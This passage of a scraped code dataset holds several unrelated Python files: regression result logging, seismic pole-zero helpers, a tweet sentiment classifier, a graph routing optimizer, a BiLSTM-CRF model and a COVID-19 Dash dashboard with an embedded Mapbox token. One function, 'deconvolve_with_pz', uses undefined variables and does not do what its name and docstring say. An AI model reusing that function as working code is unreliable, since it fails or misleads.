'a')\n\t\tout2.write('DateTime\\tRunTime\\tID\\tTag\\tY\\tAlg\\tNumInstances\\tFeatureNum\\tCVfold\\tCV_rep\\t')\n\t\tout2.write('MSE\\tMSE_sd\\tMSE_se\\tEVS\\tEVS_sd\\tEVS_se\\tr2\\tr2_sd\\tr2_se\\tPCC\\tPCC_sd\\tPCC_se\\t')\n\t\tout2.write('MSE_ho\\tMSE_ho_sd\\tMSE_ho_se\\tEVS_ho\\tEVS_ho_sd\\tEVS_ho_se\\tr2_ho\\tr2_ho_sd\\tr2_ho_se\\tPCC_ho\\tPCC_ho_sd\\tPCC_ho_se\\n')\n\t\tout2.close()\n\n\tout2 = open('RESULTS_reg.txt', 'a')\n\tout2.write('%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%i\\t%i\\t%i\\t%i\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\n' % (\n\t\ttimestamp, run_time, SAVE, TAG, y_name, ALG, len(df.index), n_features, cv_num , cv_reps, \n\t\t'\\t'.join(str(x) for x in MSE_stats), '\\t'.join(str(x) for x in EVS_stats), \n\t\t'\\t'.join(str(x) for x in r2_stats), '\\t'.join(str(x) for x in PCC_stats),\n\t\t'\\t'.join(str(x) for x in MSE_ho_stats), '\\t'.join(str(x) for x in EVS_ho_stats), \n\t\t'\\t'.join(str(x) for x in r2_ho_stats), '\\t'.join(str(x) for x in PCC_ho_stats), ))\n\n\n\t# Save detailed results file \n\twith open(SAVE + \"_results.txt\", 'w') as out:\n\t\tout.write('%s\\nID: %s\\nTag: %s\\nPredicting: %s\\nAlgorithm: %s\\nNumber of Instances: %s\\nNumber of features: %i\\n' % (\n\t\t\ttimestamp, SAVE, TAG, y_name, ALG, len(df.index), n_features))\n\t\tout.write('CV folds: %i\\nCV_reps: %i\\nParameters used:%s\\n' % (cv_num, cv_reps, params2use))\n\t\tout.write('Metric\\tMean\\tstd\\tSE\\n')\n\t\tout.write('MSE\\t%s\\nEVS\\t%s\\nR2\\t%s\\nPCC\\t%s\\n' % (\n\t\t\t'\\t'.join(str(x) for x in MSE_stats), '\\t'.join(str(x) for x in EVS_stats), \n\t\t\t'\\t'.join(str(x) for x in r2_stats), 
'\\t'.join(str(x) for x in PCC_stats)))\n\n\t\tif ho != '':\n\t\t\tout.write('\\n\\nResults from the hold out validation set\\n')\n\t\t\tout.write('Metric\\tMean\\tstd\\tSE\\n')\n\t\t\tout.write('HO MSE\\t%s\\nHO EVS\\t%s\\nHO R2\\t%s\\nHO PCC\\t%s\\n' % (\n\t\t\t'\\t'.join(str(x) for x in MSE_ho_stats), '\\t'.join(str(x) for x in EVS_ho_stats), \n\t\t\t'\\t'.join(str(x) for x in r2_ho_stats), '\\t'.join(str(x) for x in PCC_ho_stats)))\n\n\n\tprint(\"\\n\\n===> ML Results <===\")\n\tprint('Metric\\tMean\\tstd\\tSE')\n\tprint('MSE\\t%s\\nEVS\\t%s\\nR2\\t%s\\nPCC\\t%s\\n' % (\n\t\t'\\t'.join(str(x) for x in MSE_stats), '\\t'.join(str(x) for x in EVS_stats), \n\t\t'\\t'.join(str(x) for x in r2_stats), '\\t'.join(str(x) for x in PCC_stats)))\n\n\tif ho !='':\n\t\tprint('\\n\\nHold Out Set Scores:\\nMetric\\tMean\\tstd\\tSE\\n')\n\t\tprint('MSE\\t%s\\nEVS\\t%s\\nR2\\t%s\\nPCC\\t%s\\n' % (\n\t\t\t'\\t'.join(str(x) for x in MSE_ho_stats), '\\t'.join(str(x) for x in EVS_ho_stats), \n\t\t\t'\\t'.join(str(x) for x in r2_ho_stats), '\\t'.join(str(x) for x in PCC_ho_stats)))\n\n\tprint('\\nfinished!')\n\nif __name__ == '__main__':\n\tmain()","sub_path":"ML_regression.py","file_name":"ML_regression.py","file_ext":"py","file_size_in_byte":16361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"234425906","text":"# -------------------------------\n#| Robert Green GFZ Potsdam |\n#| 2017-11-03 |\n# -------------------------------\n\"\"\"\nModule containing functions for use in instrument response removal.\n\"\"\"\n\ndef deconvolve_with_pz(st,response_prefilt,pz) :\n '''\n Deconvolves stream using the supplied polezero dictionary\n -Demeans and detrends each trace of stream\n -Applies 1% taper to prevent ringing at the end of traces\n -Prefilters data prior to deconvolution to prevent amplification of noise\n\n response_prefilt=(f1,f2,f3,f4) - tuple, where f1 < f2 < f3 < f4 (a common rule of thumb is f4 >= 2*f3)\n\n Taper fraction 0.01 means you lose 7 mins both at start and end of a 24 hour file\n\n Obspy pole-zero dictionaries\n (1) \"poles\" should be a list of tuples, e.g. [(x+yj),(r+sj)]\n (2) \"zeros\" should be a list of complexes, e.g. 
[0j,0j],\n (3) \"sensitivity\" is the total sensitivity and is used if remove_sensitivity=true \n \"digitizer gain\" and \"seismometer gain\" are floats but are passive and there for reference. \n Multiplied together they give the \"sensitivity\"\n (4) \"gain\" is actually the A0 normalisation factor, the factor that defines the amplitude of pole-zero\n curve at 1 Hz.\n '''\n inv=inventory.get_response(tr.id,tr.stats.starttime)\n polezerostage=inv.get_paz()\n totalsensitivity=inv.instrument_sensitivity\n pzdict={}\n pzdict['poles']=polezerostage.poles\n pzdict['zeros']=polezerostage.zeros\n pzdict['gain']=polezerostage.normalization_factor\n pzdict['sensitivity']=totalsensitivity.value\n return pzdict\n\n\ndef read_sacpzfile(file):\n ''' Reads a sac format poles-zero file\n Expects ZEROS, POLES and CONSTANT as keywords\n Returns a paz dictionary \n Gain is set to 1. \n Sensitivity is set to CONSTANT \n\n Obspy pole-zero dictionaries\n (1) \"poles\" should be a list of tuples, e.g. [(x+yj),(r+sj)]\n (2) \"zeros\" should be a list of complexes, e.g. [0j,0j]\n (3) \"sensitivity\" is the total sensitivity and is used if remove_sensitivity=true \n \"digitizer gain\" and \"seismometer gain\" are floats but are passive and there for reference. \n Multiplied together they give the \"sensitivity\"\n (4) \"gain\" is actually the A0 normalisation factor, the factor that defines the amplitude of pole-zero\n curve at 1 Hz.\n\n '''\n from obspy.core import UTCDateTime\n fid=open(file)\n instpaz={'gain':1.}\n Z=False\n P=False\n zeros=[];poles=[]\n for line in fid:\n line=line.rstrip()\n line=line.split()\n if line[0] == 'CONSTANT':\n instpaz['sensitivity']=float(line[1])\n continue\n if line[0] == 'ZEROS':\n numofZ=int(line[1])\n Z=True\n zcount=0\n continue\n if Z:\n zeros.append(complex(float(line[0]),float(line[1])))\n zcount+=1\n if zcount == numofZ:\n Z=False\n instpaz['zeros']=zeros\n if line[0] == 'POLES':\n numofP=int(line[1])\n P=True\n pcount=0\n continue\n if P:\n poles.append(complex(float(line[0]),float(line[1])))\n pcount+=1\n if pcount == numofP:\n P=False\n instpaz['poles']=poles\n fid.close()\n return instpaz\n","sub_path":"greentools/response_removal.py","file_name":"response_removal.py","file_ext":"py","file_size_in_byte":4892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"206790799","text":"\nimport re\nimport string\nimport csv\nfrom vaderSentiment.vaderSentiment import sentiment as vaderSentiment\nfrom pymongo import MongoClient\nimport reader\nfrom collections import Counter\n\n\n#stop_words |= set(['URL', 'ATUSER', 'obama', 'barack', 'romney', 'mitt', 'rt', 'election', 'vote'])\ntrump_words = {'#tcot': 'r', 'tlot': 'r', '#teaparty': 'r', '#conservative': 'r', '#ocra': 'r'}\nswing_words = set(['#vote', '#obama', '#romney', '#gop'])\nbad_words = set(['canada', 'hunger'])\nfeat_list = set([])\nvader_threshold = 0.05\n\n'''\ndef processTweet(tweet):\n\ttweet = tweet.lower()\n\ttweet = re.sub('((www\\.[^\\s]+)|((http|https)://[^\\s]+))', 'URL', tweet)\n\ttweet = re.sub('@[^\\s]+', 'ATUSER', tweet)\n\ttweet = tweet.translate(string.maketrans(\"\",\"\"), string.punctuation)\n\treturn tweet\t\n\ndef replaceOverTwo(word):\n\tpattern = re.compile(r\"(.)\\1{1,}\", re.DOTALL)\n\treturn pattern.sub(r\"\\1\\1\", word)\n\ndef getFeatVector(tweet):\n\tvec = []\n\twords = tweet.split(\" \")\n\tfor w in words:\n\t\tw = replaceOverTwo(w)\n\t\tx = re.search(r\"^[a-zA-Z][a-zA-Z0-9]*$\", w)\n\t\tif w not in stop_words and x != 
None:\n\t\t\tvec.append(w)\n\treturn vec\n\ndef extractFeatures(vec):\n\twords = set(vec)\n\tfeats = {}\n\tfor feat in feat_list:\n\t\tif feat in words:\n\t\t\tfeats[feat] = True\n\t\telse:\n\t\t\tfeats[feat] = False\n\treturn feats\n\ndef getTrainingSet():\n\n\tglobal feat_list\n\n\ttweets = []\n\tfilename = 'training1.csv'\n\n\twith open(filename, 'rb') as fin:\n\t\tcsvin = csv.reader(fin)\n\t\tfor row in csvin:\n\t\t\tsentiment = ''\n\t\t\tif row[0] == '0':\n\t\t\t\tsentiment = '-'\n\t\t\telif row[0] == '4':\n\t\t\t\tsentiment = '+'\n\t\t\telse:\n\t\t\t\tsentiment = '0'\n\t\t\ttweets.append((getFeatVector(processTweet(row[5])), sentiment))\n\n\tprint(\"TEST1\")\n\tfor t in tweets:\n\t\tfeat_list |= set(t[0])\n\tprint(\"TEST2\")\n\treturn nltk.classify.util.apply_features(extractFeatures, tweets)\n\ndef NaiveBayes():\n\ttraining_set = getTrainingSet()\n\tprint(len(training_set))\n\tprint(type(training_set))\n\tclassifier = nltk.NaiveBayesClassifier.train(training_set)\n\tprint(\"TEST3\")\n\tprint(classifier.show_most_informative_features(20))\n'''\n\ndef getTrainingSet():\n\n\tfilename = 'debate08_sentiment_tweets.tsv'\n\tfeat_list = {}\n\n\twith open(filename, 'rU') as fin:\n\t\treader = csv.reader(fin, delimiter='\\t')\n\t\tfor row in reader:\n\t\t\tif row[0][0] != '9':\n\t\t\t\tcontinue\n\t\t\ttext = row[2]\n\t\t\ttext = text.lower() # processTweet() above is commented out, so fall back to simple lower-casing\n\t\t\t\n\t\t\tscore = 0\n\t\t\tfor i in xrange(5, len(row)):\n\t\t\t\tif row[i] == '1':\n\t\t\t\t\tscore -= 1\n\t\t\t\tif row[i] == '2':\n\t\t\t\t\tscore += 1\n\t\t\t# assumed completion: tally word frequencies so the most common words can become features\n\t\t\tfor w in text.split():\n\t\t\t\tfeat_list[w] = feat_list.get(w, 0) + 1\n\n\tfeat_counts = Counter(feat_list).most_common()\n\treturn feat_counts\n\n\n\ndef score_to_sentiment(score):\n\tsentiment = 'neu'\n\tif score > vader_threshold:\n\t\tsentiment = 'pos'\n\tif score < -vader_threshold:\n\t\tsentiment = 'neg'\n\treturn sentiment\n\ndef getVADERSentiment(text):\n\ttext = text.lower()\n\tscore = vaderSentiment(text)['compound']\n\tsentiment = score_to_sentiment(score)\n\tsubject = reader.getSubject(text)\n\n\t#if sentiment == 'neu':\n\tfor w in trump_words:\n\t\tif w in text:\n\t\t\tif trump_words[w] == subject:\n\t\t\t\treturn 'pos'\n\t\t\treturn 'neg'\n\tfor w in swing_words:\n\t\tif w in text:\n\t\t\treturn 'pos'\n\tfor w in bad_words:\n\t\tif w in text:\n\t\t\treturn 'neg'\n\n\treturn sentiment\n\ndef ClassifyAll(func):\n\tclient = MongoClient()\n\tdb = client.twitter\n\ttweets = db.tweets.find()\n\tfor t in tweets:\n\t\ttext = t['text'].encode('utf-8')\n\t\tsentiment = func(text)\n\t\tdb.tweets.update_one(\n\t\t\t{'id': t['id']}, \n\t\t\t{'$set': {'sentiment': sentiment}}\n\t\t)\n\ndef test(func, method, filename):\n\tcorrect = 0\n\ttotal = 0\n\twith open(filename, 'rb') as fin:\n\t\treader = csv.reader(fin)\n\t\tfor row in reader:\n\t\t\tanswer = int(row[0])\n\t\t\tsent = func(row[5])\n\t\t\tscore = 2\n\t\t\tif sent == 'pos':\n\t\t\t\tscore = 4\n\t\t\tif sent == 'neg':\n\t\t\t\tscore = 0\n\t\t\tif score == answer:\n\t\t\t\tcorrect += 1\n\t\t\ttotal += 1\n\tprint('%s Accuracy: %.3f%%' %(method, float(correct)/total*100))\n\n","sub_path":"sent_analysis.py","file_name":"sent_analysis.py","file_ext":"py","file_size_in_byte":3708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"358131541","text":"#!/cygdrive/c/Python34/python\n\"\"\"\nFunctions for route optimization. 
If run independently, this script\ntakes in two arguments, the from and to stops, and prints out\nseveral viable routes based on different parameters.\n\"\"\"\nfrom netgraph import NetGraph\nimport argparse\nimport sys\nimport itertools\nimport namespace\nimport random\nimport gen\nimport csv\nfrom debug import *\nfrom exceptions import *\nfrom datetime import timedelta\n\n\nROUTE_DEBUG = True\n\n\ndef route_dprint(fmt, args=None):\n if ROUTE_DEBUG:\n if args is not None:\n dprint(fmt % args)\n else:\n dprint(fmt)\n\n\ndef route(G, candidates, params):\n \"\"\"\n Find paths for each package in candidates.\n candidates is a list of 3-tuples (packageid, from, to)\n\n params are the optimization parameters to use.\n params.k is the number of paths to consider for each (from, to) pair.\n params.sampling_method = [\"batch\" | \"random\"]\n \"batch\" routes all packages for one (from, to) pair at a time.\n \"random\" picks a random stop, routes a single package from that stop and repeats until\n all are routed.\n\n This method gives a generator of (pid, path)\n \"\"\"\n # for some overall stats\n total_lat = timedelta()\n total_packages_received = len(candidates)\n total_packages_routed = 0\n min_lat = timedelta(days=10)\n max_lat = timedelta()\n paths_found = 0\n\n # a dict of the routing requests and info associated.\n reqs = {}\n reqs2 = {}\n for p, s, t in candidates:\n if (s, t) in reqs:\n reqs[(s, t)].packages_to_route.append(p)\n else:\n # initialize records.\n reqs[(s, t)] = namespace.Namespace()\n reqs[(s, t)].packages_to_route = [p]\n reqs[(s, t)].packages_routed = []\n reqs[(s, t)].paths = None\n\n # get possible paths from each stop to each destination and update reqs.\n for (s, t), rec in reqs.items():\n paths = G.k_shortest_paths(s, t, params.k)\n rec.paths = paths\n if len(paths) > 0:\n paths_found += 1\n\n # Compute flow\n mf = G.max_flow(reqs.keys())\n\n # Summary.\n for (s, t), rec in reqs.items():\n route_dprint(\"Packages to route from %d to %d\" % (s, t))\n route_dprint(rec.packages_to_route)\n route_dprint(\"\\nPossible paths: \")\n if len(rec.paths) == 0:\n route_dprint(\"no paths found\")\n for path in rec.paths:\n route_dprint(path)\n route_dprint(\"\\n\\n\")\n\n # write out the graph we're operating on.\n G.view(filename=\"diagrams/latest.gv\")\n\n # Route############################################\n\n # Initialize 'assigned' attribute of each edge.\n for edge in G.edges().values():\n edge[\"assigned\"] = 0\n\n if params.sampling_method == \"batch\":\n # for each (from, to) pair, route as many packets as possible.\n for rec in reqs.values():\n # for each package, use the first path that works.\n for pid in list(rec.packages_to_route):\n for path in rec.paths:\n try:\n path.use(pid)\n except PathFull:\n route_dprint(\"path full\")\n continue\n else:\n # I got a valid path. update records.\n rec.packages_to_route.remove(pid)\n rec.packages_routed.append(pid)\n lat = path.latency()\n total_lat += lat\n total_packages_routed += 1\n if lat < min_lat:\n min_lat = lat\n if lat > max_lat:\n max_lat = lat\n\n route_dprint(\"\\nPATH CHOSEN for package %d: \", args=pid)\n route_dprint(path)\n yield (pid, path)\n break\n\n elif params.sampling_method == \"random\":\n # pick a random (from, to) pair, route a single package. Repeat until all\n # are routed. 
or until 50 consecutive failures to route.\n # Initialize flows to maximum (i.e, capacity)\n for edge in G.edges().values():\n edge[\"assigned\"] = 0\n edge[\"flow\"] = edge[\"capacity\"]\n\n for i in range(len(reqs)):\n\n # attempt to route a random package\n (s, t) = random.choice([k for k in reqs.keys()])\n rec = reqs[(s, t)]\n if len(rec.paths) == 0:\n route_dprint(\"no paths\")\n continue\n for j in range(len(rec.packages_to_route)):\n pid = rec.packages_to_route.pop()\n no_path_found = True\n for path in rec.paths:\n try:\n path.use(pid)\n except PathFull:\n route_dprint(\"path full\")\n continue\n else:\n # I got a valid path. update records.\n no_path_found = False\n rec.packages_routed.append(pid)\n lat = path.latency()\n total_lat += lat\n total_packages_routed += 1\n if lat < min_lat:\n min_lat = lat\n if lat > max_lat:\n max_lat = lat\n\n route_dprint(\"\\nPATH CHOSEN for package %d: \", args=pid)\n route_dprint(path)\n yield (pid, path)\n break\n if no_path_found:\n # put it back, and increment no_path_count.\n rec.packages_to_route.append(pid)\n reqs[(s, t)] = rec\n\n else:\n route_dprint(\"bad sampling type\")\n\n # Print out Summary. #########################################################\n route_dprint(\"=================================================\")\n route_dprint(\"Request Summary\")\n for (s, t), rec in reqs.items():\n print(\"%d->%d: %d packages\" % (s, t, len(rec.packages_to_route) + len(rec.packages_routed)))\n\n route_dprint(\"\\n\\nRouting Summary\")\n string = \"\"\n for (s, t), rec in reqs.items():\n string += \"%d->%d: routed %d/%d packages \\n\" % \\\n (s, t,\n len(rec.packages_routed),\n len(rec.packages_routed) + len(rec.packages_to_route))\n\n # global stats.\n if total_packages_routed > 0:\n string += \"\\nmaximum latency: %s\\n\" % str(max_lat)\n string += \"minimum latency: %s\\n\" % str(min_lat)\n string += \"average latency: %s\\n\" % str(total_lat/total_packages_routed)\n string += \"%d/%d packages routed.\\n\" % (total_packages_routed, total_packages_received)\n string += \"computed maximum flow: %f\\n\" % mf\n string += \"paths found: %d\" % paths_found\n\n route_dprint(string)\n\n route_dprint(\"==================================================\")\n\n\ndef print_routes(routes):\n \"\"\"\n Pretty-print routes to stdout.\n \"\"\"\n for pid, path in routes:\n string = \"Package ID: %d\" % pid\n string += str(path)\n print(string)\n\n\ndef run(G, tests, k=5, method=\"batch\"):\n \"\"\"\n If filename has been provided, run queries in the file. Otherwise generate\n queries using function, and run them.\n \"\"\"\n\n candidates = []\n if callable(tests):\n candidates = tests()\n else:\n # interpret as filename\n with open(tests, newline='') as testfile:\n # comments start with '#'. 
ignore blank lines.\n reader = csv.DictReader(filter(lambda rw: rw[0] != '#', testfile))\n for row in reader:\n if row:\n PID = int(row[\"PackageID\"].strip())\n From = int(row[\"From\"].strip())\n To = int(row[\"To\"].strip())\n candidates.append((PID, From, To))\n\n # Get params\n params = namespace.Namespace()\n params.k = k\n params.sampling_method = method\n\n route_dprint(\"Running test:\")\n for pid, s, t in candidates:\n route_dprint(\"%d, from %d to %d\", args=(pid, s, t))\n\n routes = route(G, candidates, params)\n for r in routes:\n pass\n\n\ndef main():\n parser = argparse.ArgumentParser()\n\n parser.add_argument('-g', '--graph',\n help='specify what kind of graph to build.',\n metavar='')\n parser.add_argument('-f', '--file',\n help='run tests on file provided',\n metavar='')\n parser.add_argument('-t', '--test',\n help='run randomized tests on graph built. '\n 'random queries are generated and stored in tests/random_stops.txt',\n metavar='')\n parser.add_argument('-k', '--k',\n help='no. of shortest paths to consider between each pair',\n metavar='')\n parser.add_argument('-m', '--method',\n help='sampling method to use',\n metavar='')\n\n args = parser.parse_args()\n\n if len(sys.argv) == 1:\n parser.print_usage()\n return\n\n # Get graph\n if args.graph:\n G = NetGraph(graphtype=args.graph)\n else:\n G = NetGraph()\n\n # run: check the combined option first, otherwise it can never be reached\n if args.file:\n if args.k and args.method:\n run(G, args.file, k=int(args.k), method=args.method)\n elif args.k:\n run(G, args.file, k=int(args.k))\n elif args.method:\n run(G, args.file, method=args.method)\n else:\n run(G, args.file)\n elif args.test:\n if args.k and args.method:\n run(G, lambda: gen.random_pairs(G, N=int(args.test)), k=int(args.k), method=args.method)\n elif args.k:\n run(G, lambda: gen.random_pairs(G, N=int(args.test)), k=int(args.k))\n elif args.method:\n run(G, lambda: gen.random_pairs(G, N=int(args.test)), method=args.method)\n else:\n run(G, lambda: gen.random_pairs(G, N=int(args.test)))\n\nif __name__ == \"__main__\":\n main()","sub_path":"route.py","file_name":"route.py","file_ext":"py","file_size_in_byte":10254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"611243058","text":"\"\"\"\nmodel.py - module to store the BiLSTM-CRF model\n\"\"\"\n\nimport numpy as np\nfrom tensorflow.keras import Model\nfrom tensorflow.keras.layers import Input, LSTM, Embedding, TimeDistributed, Dropout, Bidirectional, Dense\nfrom tensorflow.keras.initializers import Constant\nfrom .loss import CRF\n\ndef embedding_map(glove_path = 'glove.6B.200d.txt'):\n \"\"\"\n embedding_map - function to load weights of the pretrained Glove embedding file\n Parameters:\n glove_path I/P path to the pretrained Glove embedding file\n embedding_index\t\tO/p\tweights of the pretrained Glove embedding file\n \"\"\"\n embeddings_index = {}\n with open(glove_path) as f:\n for line in f:\n word, coefs = line.split(maxsplit = 1)\n coefs = np.fromstring(coefs, 'f', sep = ' ')\n embeddings_index[word] = coefs\n print('Found %s word vectors.' 
%len(embeddings_index))\n return embeddings_index\n\ndef embedding_layer(word2dix, input_dim, output_dim, input_length, mask_zero):\n embedding_index = embedding_map()\n\n embedding_matrix = np.zeros((input_dim, output_dim))\n for word, i in word2dix.items():\n embedding_vector = embedding_index.get(word)\n if embedding_vector is not None:\n embedding_matrix[i] = embedding_vector\n\n return Embedding(input_dim = input_dim, output_dim = output_dim, input_length = input_length, trainable = False, embeddings_initializer = Constant(embedding_matrix))\n\ndef bilstm_crf(word2dix, maxlen, n_tags, embedding_dim, n_words, mask_zero, training = True):\n \"\"\"\n bilstm_crf - module to build BiLSTM-CRF model\n Inputs:\n - input_shape : tuple\n Tensor shape of inputs, excluding batch size\n Outputs:\n - output : tensorflow.keras.outputs.output\n BiLSTM-CRF output\n \"\"\"\n input = Input(shape = (maxlen,))\n # Embedding layer\n embeddings = embedding_layer(word2dix = word2dix, input_dim = n_words + 1, output_dim = embedding_dim, input_length = maxlen, mask_zero = mask_zero)\n output = embeddings(input)\n\n # BiLSTM layer\n output = Bidirectional(LSTM(units = 50, return_sequences = True, recurrent_dropout = 0.1))(output)\n\n # Dense layer\n output = TimeDistributed(Dense(n_tags, activation = 'relu'))(output)\n\n output = CRF(n_tags, name = 'crf_layer')(output)\n return Model(input, output)\n","sub_path":"AdvancedML/BiLSTM-CRF/src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"107539523","text":"import dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport dash_table as dt\nimport plotly.graph_objects as go\nimport plotly.express as px\nfrom dash.dependencies import Input, Output\n\nimport pandas as pd\n\n# external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\nexternal_stylesheets = ['https://codepen.io/amyoshino/pen/jzXypZ.css']\n\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\n\nserver = app.server \n\napp.title = 'COVID-19 Dashboard'\n\n# ----------------- Styling ------------------------------------------------\n\ncolors = {\n 'background': '#222222',\n 'text': '#DCDCDC',\n 'grid': \"#434343\",\n 'line': '#72bcd4',\n 'bar': '#FFB266',\n}\n\nstats_charts_style = dict(\n\tplot_bgcolor = colors['background'],\n\tpaper_bgcolor = colors['background'],\n\tfont = {'color': colors['text']},\n\tmargin = {'l':90, 'b':40, 't':10, 'r':40}\n\n)\n\ntabs_styles = {'height': '44px', 'padding-left': 20, 'padding-right': 120}\n\ntab_style = {\n\t'borderBottom': '1px solid #d6d6d6',\n\t'padding': '6px',\n\t'fontWeight': 'bold',\n\t'backgroundColor': '#222222',\n\t'color': '#DCDCDC'\n}\n\ntab_selected_style = {\n\t'borderTop': '1px solid #d6d6d6',\n\t'borderBottom': '1px solid #d6d6d6',\n\t'backgroundColor': '#4682B4',\n\t'color': 'white',\n\t'padding': '6px'\n}\n\nindicator_style = {\n\t'backgroundColor': colors['line'],\n\t'display':'inline-block',\n\t'height': 130,\n\t'width': 180,\n\t'textAlign': 'center',\n\t'margin-right': 30,\n\t'color': colors['text'],\n\t'fontWeight': 'bold',\n\n}\n\n\n\n\n# ----------------- Part One Data Preparation -----------------------------------------------\n\n# import the data \nSPREADSHEET_ID = '1D6okqtBS3S2NRC7GFVHzaZ67DuTw7LX49-fqSLwJyeo'\nRANGE_NAME = 'Cases'\nurl = 'https://docs.google.com/spreadsheets/d/{0}/gviz/tq?tqx=out:csv&sheet={1}'.format(SPREADSHEET_ID, RANGE_NAME)\ndf = 
pd.read_csv(url)\n# Change datatype of some columns\ndf.provincial_case_id = df.provincial_case_id.astype('object')\ndf.travel_yn = df.travel_yn.astype('bool')\n# Define the date and time format and conver the 'date_report' column to datetime type\ndf['date_report'] = pd.to_datetime(df['date_report']).dt.strftime('%d/%m/%Y')\ndf['date_report'] = pd.to_datetime(df['date_report'])\n# data for all canada's cumulative case\ndff = df.copy()\ndff = dff.set_index('date_report')\n\n# draw the map\nprovince_case = pd.DataFrame(df.province.value_counts()).reset_index().\\\nrename(columns={'index':'province', 'province':'cases'})\n\ngeo = {'Quebec': [53, -70],\n 'Ontario': [50, -85],\n 'BC': [53.72669, -127.647621],\n 'Alberta': [55, -115],\n 'Nova Scotia': [45, -63], \n 'NL': [53, -60],\n 'Saskatchewan': [55, -106],\n 'New Brunswick': [46.498390, -66.159668],\n 'PEI': [46.25, -63],\n 'Yukon': [64, -135],\n 'NWT': [64.2667, -119.1833], \n 'Manitoba': [53.76086, -98.813873]}\n\ngeo_df = pd.DataFrame(geo).transpose().reset_index().\\\nrename(columns = {'index':'province', 0:'lat', 1: 'lon'})\n\nprovince_case = pd.merge(province_case, geo_df)\n\ntoken = 'pk.eyJ1Ijoic3VueWFuZzA0MjYiLCJhIjoiY2s4MHV0MWNkMDRpcTNmcHFmOWhwaWoxZiJ9.hIMx3CyEx3erYGxBjnLX9Q'\n\nfig = px.scatter_mapbox(province_case, \n lon = 'lon', lat = 'lat', \n hover_name = 'province',\n size = 'cases', size_max = 45,\n color_discrete_sequence = ['#72bcd4'], \n width = 500, height = 500,\n )\n\nfig.update_layout(mapbox = {'accesstoken': token, \n 'center': {'lon': -100.3467712, 'lat':60.1303673},\n 'zoom': 1.85},\n mapbox_style ='dark', paper_bgcolor = colors['background'],\n margin = {'l': 10, 'r': 10, 't':10, 'b':10})\n\n## data for the canada line chart\ncanada = pd.DataFrame(dff.index.value_counts()).reset_index()\ncanada = canada.set_index('index')\ncanada = canada.resample('d').sum().fillna(0)\ncanada['cumu'] = canada['date_report'].cumsum()\n\n# generate the canada chart\n\n# import dataframes for other stats\nRANGE_NAME_1 = 'Mortality'\nRANGE_NAME_2 = 'Recovered'\nRANGE_NAME_3 = 'Testing'\n\nurl_1 = 'https://docs.google.com/spreadsheets/d/{0}/gviz/tq?tqx=out:csv&sheet={1}'.format(SPREADSHEET_ID, RANGE_NAME_1)\nurl_2 = 'https://docs.google.com/spreadsheets/d/{0}/gviz/tq?tqx=out:csv&sheet={1}'.format(SPREADSHEET_ID, RANGE_NAME_2)\nurl_3 = 'https://docs.google.com/spreadsheets/d/{0}/gviz/tq?tqx=out:csv&sheet={1}'.format(SPREADSHEET_ID, RANGE_NAME_3)\n\nmortality = pd.read_csv(url_1)\nrecovered = pd.read_csv(url_2)\ntesting = pd.read_csv(url_3)\n\ndef rename_first_column(dataframe):\n dataframe = dataframe.rename(columns={dataframe.columns[0]: 'id'})\n return dataframe\n\ntesting = rename_first_column(testing)\nmortailty = rename_first_column(mortality)\nrecovered = rename_first_column(recovered)\n\n# ------------------------ Prepare data for the Sankey diagram --------------\nsankey_df = pd.read_csv('sankey_df.csv')\n\n# A function to generate Sankey diagram. 
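It maps each (source, target, count)\n# row to integer node ids and builds the node/link lists that go.Sankey expects.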
\n# Credit to https://medium.com/kenlok/how-to-create-sankey-diagrams-from-dataframes-in-python-e221c1b4d6b0\ndef genSankey(df,cat_cols=[],value_cols=''):\n labelList = []\n for catCol in cat_cols:\n labelListTemp = list(set(df[catCol].values))\n labelList = labelList + labelListTemp\n # transform df into a source-target pair\n for i in range(len(cat_cols)-1):\n if i==0:\n sourceTargetDf = df[[cat_cols[i],cat_cols[i+1],value_cols]]\n sourceTargetDf.columns = ['source','target','count']\n else:\n tempDf = df[[cat_cols[i],cat_cols[i+1],value_cols]]\n tempDf.columns = ['source','target','count']\n sourceTargetDf = pd.concat([sourceTargetDf,tempDf])\n sourceTargetDf = sourceTargetDf.groupby(['source','target']).agg({'count':'sum'}).reset_index() \n # add index for source-target pair\n sourceTargetDf['sourceID'] = sourceTargetDf['source'].apply(lambda x: labelList.index(x))\n sourceTargetDf['targetID'] = sourceTargetDf['target'].apply(lambda x: labelList.index(x)) \n # creating the sankey diagram\n data = dict(\n type='sankey',\n valueformat = '.f',\n node = dict(\n pad = 10,\n thickness = 30,\n line = dict(\n color = \"black\",\n width = 0.5\n ),\n label = labelList,\n color = colors['line']\n ),\n link = dict(\n source = sourceTargetDf['sourceID'],\n target = sourceTargetDf['targetID'],\n value = sourceTargetDf['count'],\n\n )\n )\n \n layout = dict(\n font = dict(\n size = 10\n ), \n plot_bgcolor=colors['background'],\n paper_bgcolor=colors['background'],\n height = 450, \n margin = {'l':50, 'b':40, 't':30, 'r':50}\n )\n \n fig = go.Figure(data = [go.Sankey(data)], layout = layout)\n return fig\n\n\n\n\n\n\n# --------------- Part Two. App layout ---------------------\n\napp.layout = html.Div(style={'backgroundColor': colors['background']}, children=[\n\t# Headline\n html.H1(\n children='Tracking COVID-19 in Canada',\n style={\n 'textAlign': 'center',\n 'color': colors['text'],\n 'padding-top': 30,\n }\n ),\n # # Dashboard Intro\n html.Div(children=[\n \thtml.P(\"This dashboard tracks the number and distribution of COVID-19 cases in Canada in real-time. \\\n \t\tData used for this project is a publicly available dataset collected by \", \n \t\tstyle = {'display': 'inline'}),\n \thtml.A('COVID-19 Canada Open Data Working Group', href = 'https://github.com/ishaberry/Covid19Canada', \n \t\ttarget = '_blank',\n \t\tstyle = {'display': 'inline'}),\n \thtml.P(\". 
